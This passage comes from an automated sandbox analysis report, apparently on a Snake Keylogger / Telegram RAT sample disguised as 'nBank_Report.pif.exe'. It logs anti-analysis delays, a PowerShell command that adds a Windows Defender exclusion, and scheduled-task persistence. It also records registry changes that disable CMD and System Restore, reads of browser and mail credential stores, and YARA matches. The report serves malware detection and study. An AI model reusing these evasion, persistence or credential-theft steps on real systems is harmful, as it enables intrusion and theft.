              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595797Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595685Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595578Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595468Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595140Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594922Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594812Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594593Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594484Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599891
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599781
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599645
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599531
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599422
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599313
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599203
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599094
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598984
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598875
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598766
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598644
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598531
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598422
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598312
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598203
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598094
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597969
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597859
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597750
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597641
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597531
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597422
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597309
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597203
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597094
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596969
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596860
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596735
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596610
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596485
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596360
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596235
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596110
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595985
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595860
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595719
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595610
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595485
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595344
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595219
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595109
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595000
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594891
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594781
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594670
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594562
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594450
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594343
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------91103f4d3b149d7<
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------91058edac820aea
              Source: nBank_Report.pif.exe, 00000008.00000002.3865233133.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3881606096.00000000054A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------910717bc6465a90
              Source: nBank_Report.pif.exe, 00000008.00000002.3881606096.00000000054A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWWAN Miniport (Network Monitor)-WFP Native MAC Layer LightWeight Filter-0000
              Source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679C230 LdrInitializeThunk,8_2_0679C230
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Users\user\Desktop\nBank_Report.pif.exe "C:\Users\user\Desktop\nBank_Report.pif.exe"Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Users\user\Desktop\nBank_Report.pif.exe "C:\Users\user\Desktop\nBank_Report.pif.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess created: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"Jump to behavior
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Users\user\Desktop\nBank_Report.pif.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Users\user\Desktop\nBank_Report.pif.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeQueries volume information: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeQueries volume information: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Disables CMD prompt
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeRegistry value created: DisableCMD 1Jump to behavior
              Disables Windows system restore
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSRJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.3886664444.0000000007090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3882678139.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3867494805.0000000002AF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3867494805.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1714614207.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3871996905.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 7792, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 3276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 5500, type: MEMORYSTR
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 3276, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3867494805.0000000002AF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 7792, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 3276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 7100, type: MEMORYSTR
